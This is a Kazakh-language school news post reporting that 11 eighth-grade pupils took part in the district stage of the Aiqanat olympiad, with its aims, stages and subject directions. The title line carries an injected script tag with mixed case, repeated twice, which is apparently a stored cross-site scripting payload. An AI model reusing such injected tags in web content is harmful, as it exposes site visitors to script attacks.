Айқанат олимпиада<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.02.2021

    17 ақпан күні Айқанат олимпиадасының аудандық кезеңіне 8 сыныптың 11 оқушысы қатысты.

    Олимпиаданың негізгі мақсаттары мен міндеттері: қабілетті оқушыларды анықтау және қолдау, ауыл оқушыларының шығармашылық, танымдық, зияткерлік бастамаларын жандандыру; оқушылардың жалпы білім беру пәндерін оқуға қызығушылығын қалыптастыру;  оқушылар арасында тікелей байланыс пен тәжірибе алмасуға жағдай жасау.

Олимпиада ауыл мектептерінің 8-сынып оқушылары үшін жалпы білім беретін пәндер бойынша үш кезеңде өткізіледі:

· бірінші кезең аудандық

 · екінші кезең - облыстық

· үшінші кезең – республикалық

Бірінші турда аудандық кезеңде  Қатысушы бейімділігін анықтау үшін барлық пәндер бойынша тест тапсырады. Бағыттар (оқушылардың табиғи дарыны мен бейімділігін анықтау):

 Тілдік («Қазақ тілі» пәні - қазақ тілінде оқитындарға, «Орыс тілі» пәні орыс тілінде оқитындарға, қазақ (орыс) тілін дұрыс қолдану дағдыларын анықтауға арналған сұрақтар, мәтінді түсіну және қорытынды жасай білу, сөздік қорын, синтаксис пен орфографияны қолдану);

 Математикалық («Математика» пәні, математиканың негізгі ұғымдарын қолдану және осы ұғымдарға тәсілдерді қолдану дағдыларын анықтауға арналған сұрақтар, негізгі математикалық қатынастарды қолдана отырып абстрактілі тәсілді орындау, күнделікті өмірде негізгі математикалық әдістерді қолдану);

 Жаратылыстану («Физика», «Биология», «Химия» пәндері, физика, биология және химияның негізгі түсініктері мен қағидаларын қолдану дағдыларын анықтайтын сұрақтар);

 Гуманитарлық («Қазақстан тарихы», «Дүниежүзі тарихы», «География» пәндері, Қазақстан тарихы, дүниежүзі тарихы және география пәндерінде негізгі ұғымдар мен қағидаларды қолдану дағдыларын анықтауға арналған сұрақтар).

Екінші кезеңде Қатысушы 1 кезеңнің қорытындысы бойынша басым болған топ бойынша тест тапсырады : 1) Гуманитарлық; 2) Жаратылыстану

Оқушыларымызға ІІ кезеңге өтулеріне  сәттілік тілейміз.

Просмотров: 924


Пікір қосу



Деректерді қолтаңбаға қосу